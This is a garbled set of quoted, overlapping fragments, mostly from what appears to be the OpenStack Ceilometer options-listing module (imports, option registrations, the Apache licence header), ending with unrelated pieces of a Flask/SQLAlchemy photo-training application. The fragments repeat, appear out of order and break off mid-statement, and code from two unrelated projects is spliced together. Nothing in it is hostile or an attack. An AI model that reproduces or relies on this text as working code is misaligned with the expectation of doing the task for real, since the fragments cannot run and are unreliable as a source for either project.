ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def", "OF ANY KIND, either express or implied. See the # License for the", "import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import", "import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import", "generated configfile # This have been removed due to a recursive import issue", "v2 and v3 API # with discovery. But other options are possible. return", "# FIXME(sileht): readd pollster namespaces in the generated configfile # This have been", "opaque identifier. For ZeroMQ only, must ' 'be a valid host name, FQDN,", "# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the", "an opaque identifier. For ZeroMQ only, must ' 'be a valid host name,", "ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware", "But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS,", "(the \"License\"); you may # not use this file except in compliance with", "of this node, which must be valid in an AMQP ' 'key. Can", "ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS,", "('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware',", "help='Timeout seconds for HTTP requests. Set it to None to ' 'disable timeout.'),", "namespaces in the generated configfile # This have been removed due to a", "FIXME(sileht): readd pollster namespaces in the generated configfile # This have been removed", "# for the password plugin that handles keystone v2 and v3 API #", "ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client", "# # Unless required by applicable law or agreed to in writing, software", "ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ]", "removed due to a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS,", "('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS),", "itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS),", "License. You may obtain # a copy of the License at # #", "the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR", "address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. Set it to None to", "OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file',", "import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import", "handles keystone v2 and v3 API # with discovery. But other options are", "for the password plugin that handles keystone v2 and v3 API # with", "ANY KIND, either express or implied. See the # License for the specific", "ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi", "ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging", "import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [", "ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS),", "AMQP ' 'key. Can be an opaque identifier. For ZeroMQ only, must '", "itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http',", "for HTTP requests. Set it to None to ' 'disable timeout.'), ] def", "def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only the options # for", "cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must be valid in an", "import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import", "API # with discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS,", "node, which must be valid in an AMQP ' 'key. Can be an", "import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import", "import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import", "ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift", "in the generated configfile # This have been removed due to a recursive", "import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import", "= [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must be valid", "file contains only the options # for the password plugin that handles keystone", "under the Apache License, Version 2.0 (the \"License\"); you may # not use", "('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the", "WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See", "ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter',", "ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample", "it to None to ' 'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd", "' 'key. Can be an opaque identifier. For ZeroMQ only, must ' 'be", "('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only the", "See the # License for the specific language governing permissions and limitations #", "import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import", "issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS,", "ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector", "from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import", "ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http", "law or agreed to in writing, software # distributed under the License is", "import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import", "with discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS,", "ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host',", "ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only", "express or implied. See the # License for the specific language governing permissions", "keystone v2 and v3 API # with discovery. But other options are possible.", "ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils", "an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either", "# a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "CONDITIONS OF ANY KIND, either express or implied. See the # License for", "ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector", "to ' 'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster namespaces in", "# Copyright 2014 eNovance # # Licensed under the Apache License, Version 2.0", "import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import", "for the specific language governing permissions and limitations # under the License. import", "ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht):", "which must be valid in an AMQP ' 'key. Can be an opaque", "pollster namespaces in the generated configfile # This have been removed due to", "[ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS,", "v3 API # with discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types',", "v3 API # with discovery. But other options are possible. return [('service_credentials', (", "('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only the options", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi',", "'be a valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import", "compliance with the License. You may obtain # a copy of the License", "ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS,", "import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import", "return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS,", "IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS),", "# with discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS,", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware',", "import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import", "ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): #", "ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file", "import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS", "import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which", "seconds for HTTP requests. Set it to None to ' 'disable timeout.'), ]", "import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import", "must be valid in an AMQP ' 'key. Can be an opaque identifier.", "options # for the password plugin that handles keystone v2 and v3 API", "itertools import socket from keystoneauth1 import loading from oslo_config import cfg import ceilometer.agent.manager", "may # not use this file except in compliance with the License. You", "have been removed due to a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS,", "ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector',", "ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS),", "ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher", "cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. Set it to None to '", "' 'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster namespaces in the", "either express or implied. See the # License for the specific language governing", "help='Name of this node, which must be valid in an AMQP ' 'key.", "this file except in compliance with the License. You may obtain # a", "ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications", "import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(),", "or implied. See the # License for the specific language governing permissions and", "ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)),", "other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS,", "ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS),", "import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import", "timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster namespaces in the generated configfile", "import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import", "on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND,", "ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic", "itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS,", "ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)),", "def list_opts(): # FIXME(sileht): readd pollster namespaces in the generated configfile # This", "governing permissions and limitations # under the License. import itertools import socket from", "cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util", "and v3 API # with discovery. But other options are possible. return [('service_credentials',", "] def list_opts(): # FIXME(sileht): readd pollster namespaces in the generated configfile #", "# NOTE(sileht): the configuration file contains only the options # for the password", "ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain(", "or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. Set it to", "OR CONDITIONS OF ANY KIND, either express or implied. See the # License", "configuration file contains only the options # for the password plugin that handles", "obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils", "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may #", "ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts():", "ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination", "itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher',", "v2 and v3 API # with discovery. But other options are possible. ('service_credentials',", "be an opaque identifier. For ZeroMQ only, must ' 'be a valid host", "possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS),", "('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), #", "[ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must be valid in", "default=600, help='Timeout seconds for HTTP requests. Set it to None to ' 'disable", "list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only the options # for the", "('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event'," ]
[ "class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64))", "shutil import copyfile from flask import url_for, current_app as app from flask_login import", "'id': self.photo.id, }, 'user': self.user.name if self.user else None, 'result': result, 'id': self.id,", "any, we serve a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if", "None # We copy the file _, filename = os.path.split(file) path = os.path.join('vktrainer',", "If there aren't any, we serve a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_(", "{ 'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user else", "= os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self):", "show the last one previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\"", "'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user else None,", "get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as incorrect' else: try: loaded_result =", "self.user.name if self.user else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod", "first photo, we show the last one previous_photo = self.photos.order_by('-id').first() return previous_photo def", "'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user, result, **kwargs): training_result =", "get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result()", "import os import random from shutil import copyfile from flask import url_for, current_app", "path) name, _ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return", "return self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def", "cls(name=name) db.session.add(user) db.session.commit() return user, True return user, False @login_manager.user_loader def load_user(userid): return", ") class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self):", "name = db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls, name): user =", "# We copy the file _, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER,", "Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def", "url_for, current_app as app from flask_login import UserMixin from sqlalchemy import func, desc", "TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos,", "as incorrect' else: try: loaded_result = 